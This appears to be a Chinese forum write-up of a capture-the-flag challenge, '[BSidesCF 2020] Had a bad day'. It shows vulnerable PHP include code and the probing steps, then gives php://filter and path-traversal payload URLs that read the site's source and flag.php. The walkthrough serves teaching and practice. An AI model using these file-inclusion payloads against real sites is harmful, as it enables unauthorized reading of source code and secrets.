登录后更精彩...O(∩_∩)O...
您需要 登录 才可以下载或查看,没有账号?立即注册
×
BUUCTF靶场40 -- [BSidesCF 2020]Had a bad day
[PHP] 纯文本查看 复制代码 <?php
$file = $_GET['category'];
if(isset($file))
{
if( strpos( $file, "woofers" ) !== false || strpos( $file, "meowers" ) !== false || strpos( $file, "index")){
include ($file . '.php');
}
else{
echo "Sorry, we currently only support woofers and meowers.";
}
}
?>
点击后,分别是:
http://40a9696d-4306-4473-a8c9-5 ... hp?category=woofers
http://40a9696d-4306-4473-a8c9-5 ... hp?category=meowers
[HTML] 纯文本查看 复制代码 <div class="page-include">
<center>
<h4> Meow! Meow! </h4>
</center>
<img style="width:100%" src="img/cat/4.jpg"> </div>
试一下:
http://40a9696d-4306-4473-a8c9-5 ... ndex.php?category=1
再试一下:
http://40a9696d-4306-4473-a8c9-5 ... category=woofers%27
终于报错了:
Warning: include(woofers'.php): failed to open stream: No such file or directory in /var/www/html/index.php on line 37
Warning: include(): Failed opening 'woofers'.php' for inclusion (include_path='.:/usr/local/lib/php') in /var/www/html/index.php on line 37
规律:
取等号后面名字作为php的名字,直接添加后缀.php
验证一下:
http://40a9696d-4306-4473-a8c9-5 ... j.cn:81/woofers.php
还是高清的图片,不错~~
说明是include 插入的代码片段。
/index.php?category=php://filter/read=convert.base64-encode/resource=index
读取源码:
[PHP] 纯文本查看 复制代码 <html>
<body>
<h3>Cheer up!</h3>
<p>
Did you have a bad day? Did things not go your way today? Are you feeling down? Pick an option and let the adorable images cheer you up!
</p>
<div class="page-include">
<?php
$file = $_GET['category'];
if(isset($file))
{
if( strpos( $file, "woofers" ) !== false || strpos( $file, "meowers" ) !== false || strpos( $file, "index")){
include ($file . '.php');
}
else{
echo "Sorry, we currently only support woofers and meowers.";
}
}
?>
</div>
<form action="index.php" method="get" id="choice">
<center><button name="category" value="woofers" class="mdl-button mdl-button--colored mdl-button--raised mdl-js-button mdl-js-ripple-effect" data-upgraded=",MaterialButton,MaterialRipple">Woofers<span class="mdl-button__ripple-container"><span class="mdl-ripple is-animating" style="width: 189.356px; height: 189.356px; transform: translate(-50%, -50%) translate(31px, 25px);"></span></span></button>
<button name="category" value="meowers" class="mdl-button mdl-button--colored mdl-button--raised mdl-js-button mdl-js-ripple-effect" data-upgraded=",MaterialButton,MaterialRipple">Meowers<span class="mdl-button__ripple-container"><span class="mdl-ripple is-animating" style="width: 189.356px; height: 189.356px; transform: translate(-50%, -50%) translate(31px, 25px);"></span></span></button></center>
</form>
</div>
</div>
</main>
</div>
</body>
</html>传入的category参数必须有woofers,meowers,index才行 直接访问:http://40a9696d-4306-4473-a8c9-5 ... uuoj.cn:81/flag.php 仅仅返回:<!-- Can you read this flag? -->说明当前目录下面确实存在flag.php,如何读取呢?
这里构造payload来包含flag.php [PHP] 纯文本查看 复制代码 /index.php?category=woofers/../flag
[PHP] 纯文本查看 复制代码 /index.php?category=php://filter/read=convert.base64-encode/resource=index/../flag
[PHP] 纯文本查看 复制代码 /index.php?category=php://filter/convert.base64-encode/index/resource=flag
| 
发表于 2022-9-7 19:12:51
